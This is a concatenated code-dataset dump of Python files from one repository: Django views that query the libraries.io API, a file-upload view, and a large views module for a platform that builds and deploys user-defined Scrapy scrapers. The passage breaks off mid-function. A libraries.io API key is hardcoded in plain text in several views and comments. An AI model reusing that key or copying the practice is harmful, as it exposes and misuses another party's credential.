# checker_runtime = models.ForeignKey(SchedulerRuntime, blank=True, null=True, on_delete=models.SET_NULL)
# def __str__(self):
# return self.title
# class ArticleItem(DjangoItem):
# django_model = Article
# @receiver(pre_delete)
# def pre_delete_handler(sender, instance, using, **kwargs):
# if isinstance(instance, NewsWebsite):
# if instance.scraper_runtime:
# instance.scraper_runtime.delete()
# if isinstance(instance, Article):
# if instance.checker_runtime:
# instance.checker_runtime.delete()
# pre_delete.connect(pre_delete_handler)
|
Python
| 48
| 34.166668
| 109
|
/awssam/myscrapyproject/scrapyapi/srp/models.py
| 0.696503
| 0.689389
|
mrpal39/ev_code
|
refs/heads/master
|
from django.shortcuts import render
from .forms import SearchForm
import requests
def base(request):
# import requests
# # url = "https://gplaystore.p.rapidapi.com/newFreeApps"
# url="https://libraries.io/api/"
# querystring = {"platforms":"NPM/base62"}
# headers = {'x-rapidapi-key': "?api_key=306cf1684a42e4be5ec0a1c60362c2ef'" }
# response = requests.request("GET", url, headers=headers, params=querystring)
# print(response.text)
return render(request, 'base.html'
)
def home(request):
# Platforms=(' https://libraries.io/api/platforms?api_key=306cf1684a42e4be5ec0a1c60362c2ef')
# Project=('https://libraries.io/api/NPM/base62?api_key=306cf1684a42e4be5ec0a1c60362c2ef')
# url=requests()
# url='https://libraries.io/api/:platform/:name/dependent_repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef'
# url=requests.get('https://libraries.io/api/github/librariesio/repositories?api_key=306cf1684a42e4be5ec0a1c60362c2ef')
url=requests.get('https://libraries.io/api/platforms?api_key=306cf1684a42e4be5ec0a1c60362c2ef')
form=url.json()
return render(request, 'index.html',{
'form':form
}
)
def Search(request):
# form= SearchForm()
# query=None
# results=[]
# # if 'query' in requests.GET:
# # form=SearchForm(request.GET)
# # if form.is_valid():
# # query=form.cleaned_data['query']
# # results=Post.published.annotate(
# # search =SearchVector('title','body'),
# # ).filter(search=query)
r=requests.get('https://libraries.io/api/search?q=&api_key=306cf1684a42e4be5ec0a1c60362c2ef')
dr=r.json()
return render(request, 'Search.html',{
'search':dr
}
)
# def post_search(request):
# form= SearchForm()
# payload={'key1':'search?q=','key2':['form','&api_key=306cf1684a42e4be5ec0a1c60362c2ef']}
# url=requests.get=('https://libraries.io/api/get',params=payload)
# # results=[]
# # if 'query' in request.GET:
# # form=SearchForm(
# # if form.is_valid():
# # query=form.cleaned_data['query']
# # results=Post.published.annotate(
# # search =SearchVector('title','body'),
# # ).filter(search=query)
# return render(request,'search.html',{
# 'url':url,
# # 'query':query,
# # 'results':results
# })
|
Python
| 79
| 29.772152
| 123
|
/myapi/devfile/core/views.py
| 0.621677
| 0.557055
|
mrpal39/ev_code
|
refs/heads/master
|
from django.http import response
from django.shortcuts import render, redirect
from .forms import DocumentForm
import requests
from django.conf import settings
from django.core.files.storage import FileSystemStorage
def simple_upload(request):
if request.method == 'POST':
myfile = DocumentForm(request.POST, request.FILES)
myfile = request.FILES['file']
fs = FileSystemStorage()
filename = fs.save(myfile.name, myfile)
uploaded_file_url = fs.url(filename)
return render(request, 'simple_upload.html', {
'uploaded_file_url': uploaded_file_url
})
return render(request, 'simple_upload.html')
def model_form_upload(request):
if request.method == 'POST':
form = DocumentForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return redirect('home')
else:
form = DocumentForm()
return render(request, 'core/model_form_upload.html', {
'form': form
})
def api(request):
api_key ='306cf1684a42e4be5ec0a1c60362c2ef'
name='npm'
api_url="https://libraries.io/api/search?q={}&api_key={}".format(name ,api_key)
response=requests.get(api_url)
response_dict = response.json()
return render(request, 'api.html',{'api': response_dict, }
)
# return render(request,'search.html',{
# 'url':url,
# # 'query':query,
# # 'results':results
# })
|
Python
| 67
| 21.328358
| 82
|
/myapi/devfile/gitapi/views.py
| 0.626915
| 0.614257
|
mrpal39/ev_code
|
refs/heads/master
|
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.contrib.auth import update_session_auth_hash
from .forms import CreateProject, DeleteProject, ItemName, FieldName, CreatePipeline, LinkGenerator, Scraper, Settings, ShareDB, ChangePass, ShareProject
from django.http import HttpResponseRedirect
from django.http import HttpResponse, HttpResponseNotFound, JsonResponse
from .models import Project, Item, Pipeline, Field, LinkgenDeploy, ScrapersDeploy, Dataset
from django.forms.util import ErrorList
from itertools import groupby
from django.core.urlresolvers import reverse
import os
import shutil
from string import Template
from .scrapy_packages import settings
from pymongo import MongoClient
import glob
import subprocess
import requests
import json
import datetime
import dateutil.parser
import socket
from django.contrib.auth.models import User
from bson.json_util import dumps
import threading
import crypt
try:
# Python 3
from urllib.parse import urlparse
except ImportError:
# Python 2
from urlparse import urlparse
try:
from urllib.parse import quote
except ImportError:
from urllib import quote
def generate_default_settings():
settings = """# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'unknown'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'"""
return settings
@login_required
def main_page(request):
projects = Project.objects.filter(user=request.user)
datasets = Dataset.objects.filter(user=request.user)
userprojects = []
databases = []
for project in projects:
singleproject = {}
singleproject['name'] = project.project_name
userprojects.append(singleproject)
for dataset in datasets:
databases.append(dataset.database)
return render(request, template_name="mainpage.html",
context={'username': request.user.username, 'projects': userprojects, 'databases': databases})
@login_required
def create_new(request):
if request.method == 'GET':
form = CreateProject()
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
form = CreateProject(request.POST)
if form.is_valid():
allprojects =[]
userprojects = Project.objects.filter(user=request.user)
for project in userprojects:
allprojects.append(project.project_name)
if form.cleaned_data['projectname'] in allprojects:
errors = form._errors.setdefault("projectname", ErrorList())
errors.append('Project named %s already exists. Please choose another name' % form.cleaned_data['projectname'])
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
else:
project = Project()
project.project_name = form.cleaned_data['projectname']
project.user = request.user
project.settings_scraper = generate_default_settings()
project.settings_link_generator = generate_default_settings()
project.scraper_function = '''def parse(self, response):\n pass'''
project.link_generator = '''start_urls = [""]\ndef parse(self, response):\n pass'''
project.save()
# project data will be saved in username_projectname database, so we need to
# give the current user ownership of that database
mongodbname = request.user.username + "_" + project.project_name
mongouri = "mongodb://" + settings.MONGODB_USER + ":" + quote(settings.MONGODB_PASSWORD) + "@" + settings.MONGODB_URI + "/admin"
connection = MongoClient(mongouri)
connection.admin.command('grantRolesToUser', request.user.username,
roles=[{'role': 'dbOwner', 'db': mongodbname}])
connection.close()
dataset = Dataset()
dataset.user = request.user
dataset.database = mongodbname
dataset.save()
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
else:
return render(request, 'createproject.html', {'username': request.user.username, 'form': form})
else:
return HttpResponseNotFound('Nothing is here.')
@login_required
def manage_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
projectdata = {}
projectdata['settings_scraper'] = project.settings_scraper
projectdata['settings_link_generator'] = project.settings_link_generator
projectdata['items'] = []
projectdata['pipelines'] = []
if len(project.link_generator) == 0:
projectdata['link_generator'] = False
else:
projectdata['link_generator'] = True
if len(project.scraper_function) == 0:
projectdata['scraper_function'] = False
else:
projectdata['scraper_function'] = True
items = Item.objects.filter(project=project)
pipelines = Pipeline.objects.filter(project=project)
for item in items:
projectdata['items'].append(item)
for pipeline in pipelines:
projectdata['pipelines'].append(pipeline)
return render(request, 'manageproject.html',
{'username': request.user.username, 'project': project.project_name, 'projectdata': projectdata})
@login_required
def delete_project(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = DeleteProject()
return render(request, 'deleteproject.html', {'username': request.user.username, 'form': form, 'projectname': projectname})
if request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("mainpage"))
elif 'submit' in request.POST:
project.delete()
return HttpResponseRedirect(reverse("mainpage"))
else:
return HttpResponseNotFound('Nothing is here.')
@login_required
def create_item(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form1 = ItemName()
form2 = FieldName()
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1, 'form2': form2, 'project': project.project_name})
if request.method == 'POST':
if 'submit' in request.POST:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
if form1.is_valid() and form2.is_valid():
item = Item.objects.filter(project=project, item_name=form1.cleaned_data['itemname'])
if len(item):
errors = form1._errors.setdefault("itemname", ErrorList())
errors.append(
'Item named %s already exists. Please choose another name' % form1.cleaned_data['itemname'])
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
allfields =[]
valuetofield = {}
for field in form2.fields:
if form2.cleaned_data[field]:
if field != 'extra_field_count':
valuetofield[form2.cleaned_data[field]] = field
allfields.append(form2.cleaned_data[field])
duplicates = [list(j) for i, j in groupby(allfields)]
for duplicate in duplicates:
if len(duplicate) > 1:
errors = form2._errors.setdefault(valuetofield[duplicate[0]], ErrorList())
errors.append('Duplicate fields are not allowed.')
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
item = Item()
item.item_name = form1.cleaned_data['itemname']
item.project = project
item.save()
for field in allfields:
onefield = Field()
onefield.item = item
onefield.field_name = field
onefield.save()
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
return render(request, 'additem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
@login_required
def itemslist(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
itemtracker = 0
items = Item.objects.filter(project=project)
itemdata = []
for item in items:
itemdata.append([])
itemdata[itemtracker].append(item.item_name)
fields = Field.objects.filter(item=item)
if fields:
itemdata[itemtracker].append([])
for field in fields:
itemdata[itemtracker][1].append(field.field_name)
itemtracker += 1
return render(request, 'itemslist.html',
{'username': request.user.username, 'project': project.project_name, 'items': itemdata})
@login_required
def deleteitem(request, projectname, itemname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
item = Item.objects.get(project=project, item_name=itemname)
except Item.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
# using the form that was used for deleting the project
form = DeleteProject()
return render(request, 'deleteitem.html',
{'username': request.user.username, 'form': form, 'projectname': projectname, 'itemname': itemname})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(projectname,)))
elif 'submit' in request.POST:
item.delete()
return HttpResponseRedirect(reverse("listitems", args=(projectname,)))
@login_required
def edititem(request, projectname, itemname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
item = Item.objects.get(project=project, item_name=itemname)
except Item.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
fields = Field.objects.filter(item=item)
fieldcounter = 0
fieldlist = []
fielddata = {}
for field in fields:
fieldlist.append(field.field_name)
fieldcounter += 1
if fieldcounter == 1:
fielddata['fieldname'] = fieldlist[0]
fielddata['extra_field_count'] = 0
elif fieldcounter > 1:
fielddata['fieldname'] = fieldlist[0]
fielddata['extra_field_count'] = fieldcounter - 1
for i in range(1,fieldcounter):
fielddata['field_%d' % (i+1)] = fieldlist[i]
form1 = ItemName({'itemname': itemname})
form2 = FieldName(initial=fielddata, extra=fielddata['extra_field_count'])
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1, 'form2': form2, 'project': project.project_name})
elif request.method == 'POST':
if 'submit' in request.POST:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
if form1.is_valid() and form2.is_valid():
newitemname = Item.objects.filter(project=project, item_name=form1.cleaned_data['itemname'])
if len(newitemname):
for oneitem in newitemname:
if oneitem.item_name != item.item_name:
errors = form1._errors.setdefault('itemname', ErrorList())
errors.append('Item named %s already exists. Please choose another name' % form1.cleaned_data['itemname'])
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
allfields = []
valuetofield = {}
for field in form2.fields:
if form2.cleaned_data[field]:
if field != 'extra_field_count':
valuetofield[form2.cleaned_data[field]] = field
allfields.append(form2.cleaned_data[field])
                # sort before grouping so every repeated field name is caught, not only adjacent repeats
                duplicates = [list(j) for i, j in groupby(sorted(allfields))]
for duplicate in duplicates:
if len(duplicate) > 1:
errors = form2._errors.setdefault(valuetofield[duplicate[0]], ErrorList())
errors.append('Duplicate fields are not allowed.')
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
deletefield = Field.objects.filter(item=item)
for field in deletefield:
field.delete()
item.item_name = form1.cleaned_data['itemname']
item.save()
for field in allfields:
onefield = Field()
onefield.item = item
onefield.field_name = field
onefield.save()
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
elif 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listitems", args=(project.project_name,)))
else:
form1 = ItemName(request.POST)
form2 = FieldName(request.POST, extra=request.POST.get('extra_field_count'))
return render(request, 'edititem.html',
{'username': request.user.username, 'form1': form1,
'form2': form2, 'project': project.project_name})
@login_required
def addpipeline(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
defined_items = {}
items = Item.objects.filter(project=project)
for item in items:
defined_items[item.item_name] = []
fields = Field.objects.filter(item=item)
for field in fields:
defined_items[item.item_name].append(field.field_name)
if request.method == 'GET':
initial_code = '''def process_item(self, item, spider):\n return item
'''
form = CreatePipeline(initial={'pipelinefunction': initial_code})
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
if 'submit' in request.POST:
form = CreatePipeline(request.POST)
if form.is_valid():
names = []
orders =[]
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
names.append(pipeline.pipeline_name)
orders.append(pipeline.pipeline_order)
if form.cleaned_data['pipelinename'] in names:
errors = form._errors.setdefault('pipelinename', ErrorList())
errors.append(
'Pipeline named %s already exists. Please choose another name' % form.cleaned_data['pipelinename'])
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
if int(form.cleaned_data['pipelineorder']) in orders:
errors = form._errors.setdefault('pipelineorder', ErrorList())
errors.append(
'Pipeline order %s already exists for another pipeline function. Enter a different order' % form.cleaned_data['pipelineorder'])
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
pipeline = Pipeline()
pipeline.pipeline_name = form.cleaned_data['pipelinename']
pipeline.pipeline_order = form.cleaned_data['pipelineorder']
pipeline.pipeline_function = form.cleaned_data['pipelinefunction']
pipeline.project = project
pipeline.save()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
else:
return render(request, "addpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
@login_required
def pipelinelist(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
itemtracker = 0
pipelines = Pipeline.objects.filter(project=project)
pipelinedata = []
for pipeline in pipelines:
pipelinedata.append([])
pipelinedata[itemtracker].append(pipeline.pipeline_name)
pipelinedata[itemtracker].append(pipeline.pipeline_order)
itemtracker += 1
return render(request, 'pipelinelist.html', {'username': request.user.username, 'project': project.project_name, 'items': pipelinedata})
@login_required
def editpipeline(request, projectname, pipelinename):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
pipeline = Pipeline.objects.get(project=project, pipeline_name=pipelinename)
except Pipeline.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
defined_items = {}
items = Item.objects.filter(project=project)
for item in items:
defined_items[item.item_name] = []
fields = Field.objects.filter(item=item)
for field in fields:
defined_items[item.item_name].append(field.field_name)
if request.method == 'GET':
form = CreatePipeline(initial={'pipelinename': pipeline.pipeline_name,
'pipelineorder': pipeline.pipeline_order,
'pipelinefunction': pipeline.pipeline_function})
return render(request, "editpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
if 'submit' in request.POST:
form = CreatePipeline(request.POST)
if form.is_valid():
newpipelinename = Pipeline.objects.filter(project=project, pipeline_name=form.cleaned_data['pipelinename'])
if len(newpipelinename):
for oneitem in newpipelinename:
if oneitem.pipeline_name != pipeline.pipeline_name:
errors = form._errors.setdefault('pipelinename', ErrorList())
errors.append(
'Pipeline named %s already exists. Please choose another name' % form.cleaned_data[
'pipelinename'])
return render(request, 'editpipeline.html',
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
newpipelineorder = Pipeline.objects.filter(project=project,
pipeline_order=form.cleaned_data['pipelineorder'])
if len(newpipelineorder):
for oneitem in newpipelineorder:
if oneitem.pipeline_order != pipeline.pipeline_order:
errors = form._errors.setdefault('pipelineorder', ErrorList())
errors.append(
'Pipeline order %s already exists for another pipeline function. Enter a different order' % form.cleaned_data['pipelineorder'])
return render(request, 'editpipeline.html',
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
pipeline.pipeline_name = form.cleaned_data['pipelinename']
pipeline.pipeline_order = form.cleaned_data['pipelineorder']
pipeline.pipeline_function = form.cleaned_data['pipelinefunction']
pipeline.save()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
else:
return render(request, "editpipeline.html",
{'username': request.user.username, 'form': form, 'project': project.project_name, 'items': defined_items})
@login_required
def deletepipeline(request, projectname, pipelinename):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
try:
pipeline = Pipeline.objects.get(project=project, pipeline_name=pipelinename)
except Pipeline.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
if request.method == 'GET':
form = DeleteProject()
return render(request, 'deletepipeline.html',
{'username': request.user.username,
'form': form, 'projectname': project.project_name, 'pipelinename': pipeline.pipeline_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
elif 'submit' in request.POST:
pipeline.delete()
return HttpResponseRedirect(reverse("listpipelines", args=(project.project_name,)))
@login_required
def linkgenerator(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
spiderclassnamelabel = "class " + request.user.username.title() + project.project_name.title() + "Spider:"
if request.method == 'GET':
form = LinkGenerator(initial={'function': project.link_generator})
form.fields['function'].label = spiderclassnamelabel
return render(request,
'addlinkgenerator.html', {'username': request.user.username,
'form': form, 'project': project.project_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
if 'submit' in request.POST:
form = LinkGenerator(request.POST)
form.fields['function'].label = spiderclassnamelabel
if form.is_valid():
project.link_generator = form.cleaned_data['function']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(project.project_name,)))
else:
return render(request, 'addlinkgenerator.html',
{'username': request.user.username, 'form': form, 'project': project.project_name})
@login_required
def scraper(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
spiderclassnamelabel = "class " + request.user.username.title() + project.project_name.title() + "Spider:"
if request.method == 'GET':
form = Scraper(initial={'function': project.scraper_function})
form.fields['function'].label = spiderclassnamelabel
return render(request, 'addscraper.html', {'username': request.user.username, 'form': form, 'project': project.project_name})
elif request.method == 'POST':
if 'cancel' in request.POST:
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
if 'submit' in request.POST:
form = Scraper(request.POST)
form.fields['function'].label = spiderclassnamelabel
if form.is_valid():
project.scraper_function = form.cleaned_data['function']
project.save()
return HttpResponseRedirect(reverse("manageproject", args=(projectname,)))
else:
return render(request, 'addscraper.html',
{'username': request.user.username, 'form': form, 'project': project.project_name})
def create_folder_tree(tree):
d = os.path.abspath(tree)
if not os.path.exists(d):
os.makedirs(d)
else:
shutil.rmtree(d)
os.makedirs(d)
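# Hedged usage sketch (path is hypothetical): create_folder_tree recreates the target
# directory from scratch, wiping any previous deployment artifacts first, e.g.
#   create_folder_tree('/srv/app/projects/alice/myproject/scraper/spiders')
# leaves an empty 'spiders' tree regardless of what was there before.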
@login_required
def change_password(request):
if request.method == 'POST':
form = ChangePass(request.user, request.POST)
if form.is_valid():
user = form.save()
update_session_auth_hash(request, user)
mongodb_user_password_change(request.user.username, form.cleaned_data['new_password1'])
if settings.LINUX_USER_CREATION_ENABLED:
try:
linux_user_pass_change(request.user.username, form.cleaned_data['new_password1'])
except:
pass
return HttpResponseRedirect(reverse("mainpage"))
else:
return render(request, 'changepassword.html', {
'username': request.user.username,
'form': form
})
else:
form = ChangePass(request.user)
return render(request, 'changepassword.html', {
'username': request.user.username,
'form': form
})
@login_required
def deploy(request, projectname):
try:
project = Project.objects.get(user=request.user, project_name=projectname)
except Project.DoesNotExist:
return HttpResponseNotFound('Nothing is here.')
projectitems = Item.objects.filter(project=project)
projectlinkgenfunction = project.link_generator
projectscraperfunction = project.scraper_function
if not projectitems or not projectlinkgenfunction or not projectscraperfunction:
return HttpResponseNotFound('Not all required project parts are present for deployment. Please review your project and deploy again.')
basepath = os.path.dirname(os.path.abspath(__file__))
    # give the project and its folders a unique on-disk name so deployments from different users cannot collide
projectnameonfile = request.user.username + '_' + projectname
    # remove any existing project folder before recreating it
create_folder_tree(basepath + "/projects/%s/%s" % (request.user.username, projectname))
#Create project folder structure
folder1 = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile, 'spiders')
folder2 = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile, 'spiders')
#Link generator folders
linkgenouterfolder = basepath + "/projects/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator')
linkgenprojectfolder = basepath + "/projects/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile)
linkgenspiderfolder = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'linkgenerator', projectnameonfile, 'spiders')
#Scraper folders
scraperouterfolder = basepath + "/projects/%s/%s/%s" % (request.user.username, projectname, 'scraper')
scraperprojectfolder = basepath + "/projects/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile)
scraperspiderfolder = basepath + "/projects/%s/%s/%s/%s/%s" % (request.user.username, projectname, 'scraper', projectnameonfile, 'spiders')
#Link generator files
linkgencfgfile = linkgenouterfolder + "/scrapy.cfg"
linkgensettingsfile = linkgenprojectfolder + "/settings.py"
linkgenspiderfile = linkgenspiderfolder + "/%s_%s.py" % (request.user.username, projectname)
#Scraper files
scrapercfgfile = scraperouterfolder + "/scrapy.cfg"
scrapersettingsfile = scraperprojectfolder + "/settings.py"
scraperspiderfile = scraperspiderfolder + "/%s_%s.py" % (request.user.username, projectname)
scraperitemsfile = scraperprojectfolder + "/items.py"
scraperpipelinefile = scraperprojectfolder + "/pipelines.py"
#Create needed folders
create_folder_tree(folder1)
create_folder_tree(folder2)
    # put __init__.py files into the link generator package
shutil.copy(basepath + '/scrapy_packages/__init__.py', linkgenprojectfolder)
shutil.copy(basepath + '/scrapy_packages/__init__.py', linkgenspiderfolder)
#putting rabbitmq folder alongside project
shutil.copytree(basepath + '/scrapy_packages/rabbitmq', linkgenprojectfolder + '/rabbitmq')
#creating a cfg for link generator
scrapycfg = '''[settings]\n
default = %s.settings
[deploy:linkgenerator]
url = %s
project = %s
''' % (projectnameonfile, settings.LINK_GENERATOR, projectnameonfile)
with open(linkgencfgfile, 'w') as f:
f.write(scrapycfg)
#creating a settings.py file for link generator
with open(basepath + '/scrapy_templates/settings.py.tmpl', 'r') as f:
settingspy = Template(f.read()).substitute(project_name=projectnameonfile)
settingspy += '\n' + project.settings_link_generator
settingspy += '\nSCHEDULER = "%s"' % (projectnameonfile + settings.SCHEDULER)
settingspy += '\nSCHEDULER_PERSIST = %s' % settings.SCHEDULER_PERSIST
settingspy += '\nRABBITMQ_HOST = "%s"' % settings.RABBITMQ_HOST
settingspy += '\nRABBITMQ_PORT = %s' % settings.RABBITMQ_PORT
settingspy += '\nRABBITMQ_USERNAME = "%s"' % settings.RABBITMQ_USERNAME
settingspy += '\nRABBITMQ_PASSWORD = "%s"' % settings.RABBITMQ_PASSWORD
with open(linkgensettingsfile, 'w') as f:
f.write(settingspy)
#creating a spider file for link generator
with open(basepath + '/scrapy_templates/linkgenspider.py.tmpl', 'r') as f:
spider = Template(f.read()).substitute(spider_name=request.user.username + "_" + projectname, SpiderClassName=request.user.username.title() + projectname.title() + "Spider")
spider += '\n'
linkgenlines = project.link_generator.splitlines()
for lines in linkgenlines:
spider += ' ' + lines + '\n'
with open(linkgenspiderfile, 'w') as f:
f.write(spider)
    # put __init__.py files into the scraper package
shutil.copy(basepath + '/scrapy_packages/__init__.py', scraperprojectfolder)
shutil.copy(basepath + '/scrapy_packages/__init__.py', scraperspiderfolder)
# putting rabbitmq folder alongside project
shutil.copytree(basepath + '/scrapy_packages/rabbitmq', scraperprojectfolder + '/rabbitmq')
# putting mongodb folder alongside project
shutil.copytree(basepath + '/scrapy_packages/mongodb', scraperprojectfolder + '/mongodb')
# creating a cfg for scraper
scrapycfg = '''[settings]\n
default = %s.settings\n\n''' % (projectnameonfile)
workercount = 1
for worker in settings.SCRAPERS:
scrapycfg += '[deploy:worker%d]\nurl = %s\n' % (workercount, worker)
workercount += 1
scrapycfg += '\nproject = %s' % (projectnameonfile)
with open(scrapercfgfile, 'w') as f:
f.write(scrapycfg)
# creating a spider file for scraper
with open(basepath + '/scrapy_templates/scraperspider.py.tmpl', 'r') as f:
spider = Template(f.read()).substitute(spider_name=request.user.username + "_" + projectname,
SpiderClassName=request.user.username.title() + projectname.title() + "Spider",
project_name=projectnameonfile)
spider += '\n'
scraperlines = project.scraper_function.splitlines()
for lines in scraperlines:
spider += ' ' + lines + '\n'
with open(scraperspiderfile, 'w') as f:
f.write(spider)
#creating items file for scraper
items = Item.objects.filter(project=project)
itemsfile = 'import scrapy\n'
fieldtemplate = ' %s = scrapy.Field()\n'
for item in items:
itemsfile += 'class %s(scrapy.Item):\n' % item.item_name
fields = Field.objects.filter(item=item)
for field in fields:
itemsfile += fieldtemplate % field.field_name
itemsfile += fieldtemplate % 'ack_signal'
itemsfile += '\n'
with open(scraperitemsfile, 'w') as f:
f.write(itemsfile)
#creating pipelines file for scraper
pipelinesfile = ''
pipelinedict = {}
pipelines = Pipeline.objects.filter(project=project)
for pipeline in pipelines:
pipelinedict[pipeline.pipeline_name] = pipeline.pipeline_order
pipelinesfile += 'class %s(object):\n' % pipeline.pipeline_name
pipfunctionlines = pipeline.pipeline_function.splitlines()
for lines in pipfunctionlines:
pipelinesfile += ' ' + lines + '\n'
with open(scraperpipelinefile, 'w') as f:
f.write(pipelinesfile)
# creating a settings.py file for scraper
with open(basepath + '/scrapy_templates/settings.py.tmpl', 'r') as f:
settingspy = Template(f.read()).substitute(project_name=projectnameonfile)
settingspy += '\n' + project.settings_scraper
